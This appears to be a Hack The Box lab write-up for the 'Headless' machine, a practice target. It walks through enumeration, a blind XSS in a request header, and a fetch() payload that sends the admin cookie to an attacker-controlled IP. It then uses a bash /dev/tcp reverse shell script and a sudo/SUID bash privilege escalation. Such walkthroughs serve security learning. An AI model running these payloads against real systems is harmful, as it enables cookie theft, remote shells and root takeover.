---
title:  HTB - Headless
date: 2024-02-02 12:17:34 -0400
categories: [hackthebox , Headless]
tags: [HackTheBox, Python Werkzeug, XSS, User-Agent]
image:
  path: /assets/img/post/headless/Headless-card.png
  lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
  alt: Hack the Box - Headless.
---

## Box Info

| Name                  | Headless         | 
| :-------------------- | ---------------: |
| Release Date          | 23 Mar, 2024     |
| OS                    | Linux            |
| Rated Difficulty      | Easy             |

## **Enumeration**

```bash
nmap -A -Pn 10.10.11.8 -oG allPorts
```

![Image](/assets/img/post/headless/1.png)

[http://10.10.11.8:5000/](http://10.10.11.8:5000/)

![Image](/assets/img/post/headless/2.png)

## Scan Directory

We dont found anything interesting...

![Image](/assets/img/post/headless/3.png)

### BurpSuite

Now go to /support

![Image](/assets/img/post/headless/5.png)

And we try to intercept this with Burpsuite

![Image](/assets/img/post/headless/4.png)

If I try some HTML injection returns the HTTP request content.

![Image](/assets/img/post/headless/attemp.png)

The HTTP `response` headers show it’s a `Werkzeug / Python server`

**Exploitation**

**Blind XSS on User-Agent**

Try to figerout a large time i found the XSS over header put in a `header-false: a<script>alert(1)</script>`

`<img src=x onerror=fetch('http://<IP>:<PORT>/'+document.cookie);>`

![Image](/assets/img/post/headless/6.png)


**Python Server**

`python -m http.server 8020`

![Image](/assets/img/post/headless/7.png)

![Image](/assets/img/post/headless/8.png)

After Exploit XSS at User-Agent, we get a reply back with the **admin cookie** at the python server

![Image](/assets/img/post/headless/9.png)


[http://10.10.11.8:5000/dashboard](http://10.10.11.8:5000/dashboard)

![Image](/assets/img/post/headless/10.png)

![Image](/assets/img/post/headless/11.png)


**Reverse Shell**

![Image](/assets/img/post/headless/12.png)

```
#!/bin/bash
/bin/bash -c 'exec bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'
#Create Reverse Shell script into a file, In my case I create .sh
```

![Image](/assets/img/post/headless/13.png)

![Image](/assets/img/post/headless/14.png)

![Image](/assets/img/post/headless/15.png)

![Image](/assets/img/post/headless/16.png)

**User Flag**

## Privilege Escalation

#### Check sudo -l

![Image](/assets/img/post/headless/17.png)

Syscheck

cat /usr/bin/syscheck:

![Image](/assets/img/post/headless/18.png)


### Exploit [initdb.sh](http://initdb.sh)

`echo "chmod u+s /bin/bash" > initdb.sh chmod +x initdb.sh`

- `chmod u+s /bin/bash`: Sets the set-user-ID (SUID) permission on `/bin/bash`, allowing users to execute the bash shell with the file owner's (typically root) privileges.
- `chmod +x initdb.sh`: This command changes the permissions of the file `initdb.sh`, making it executable (`+x`) by the file's owner, group, and others. This allows the script to be run as a program by the user.

![Image](/assets/img/post/headless/19.png)

```
sudo /usr/bin/syscheck
/bin/bash -p
```

`/bin/bash -p`: starts a bash shell with root privileges retained, due to the SUID bit making the shell run with the file owner's (root's) effective ID.

![Image](/assets/img/post/headless/20.png)

**Root Flag**